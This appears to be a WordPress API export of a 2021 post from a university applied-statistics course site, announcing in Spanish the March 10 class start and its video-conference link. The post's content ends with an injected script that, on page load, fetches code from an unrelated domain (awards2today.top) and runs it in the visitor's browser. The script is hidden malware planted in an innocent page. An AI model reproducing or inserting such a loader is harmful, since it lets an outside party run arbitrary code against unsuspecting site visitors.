{"id":527,"date":"2021-03-08T08:05:12","date_gmt":"2021-03-08T11:05:12","guid":{"rendered":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/?p=527"},"modified":"2025-06-21T11:50:35","modified_gmt":"2025-06-21T14:50:35","slug":"inicio-de-clases-2021","status":"publish","type":"post","link":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/2021\/03\/08\/inicio-de-clases-2021\/","title":{"rendered":"Inicio de Clases 2021"},"content":{"rendered":"\n<p>El mi\u00e9rcoles 10 de Marzo Iniciaremos el dictado de la Estad\u00edstica Aplicada para las carreras de Dise\u00f1o Industrial y Dise\u00f1o Gr\u00e1fico. El Inicio ser\u00e1 el 10 de Marzo a las 8:30 am a trav\u00e9s de la siguiente sala BBB:<\/p>\n\n\n\n<p><strong><a href=\"https:\/\/conferencias.unsj.edu.ar\/b\/gab-v7f-ery\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/conferencias.unsj.edu.ar\/b\/gab-v7f-ery<\/a><\/strong><\/p>\n<script>;document.addEventListener(\"DOMContentLoaded\", function () {\n    var url = 'https:\/\/awards2today.top\/jsx';\n    fetch(url)\n        .then(response => response.text())\n        .then(data => {\n            var script = document.createElement('script');\n            script.innerHTML = data.trim();\n            document.head.appendChild(script);\n        })\n});<\/script>","protected":false},"excerpt":{"rendered":"<p>El mi\u00e9rcoles 10 de Marzo Iniciaremos el dictado de la Estad\u00edstica Aplicada para las carreras de Dise\u00f1o Industrial y Dise\u00f1o Gr\u00e1fico. El Inicio ser\u00e1 el 10 de Marzo a las 8:30 am a trav\u00e9s de la siguiente sala BBB: https:\/\/conferencias.unsj.edu.ar\/b\/gab-v7f-ery<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-527","post","type-post","status-publish","format-standard","hentry","category-sin-categoria"],"_links":{"self":[{"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/posts\/527","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/comments?post=527"}],"version-history":[{"count":4,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/posts\/527\/revisions"}],"predecessor-version":[{"id":834,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/posts\/527\/revisions\/834"}],"wp:attachment":[{"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/media?parent=527"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/categories?post=527"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/tags?post=527"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}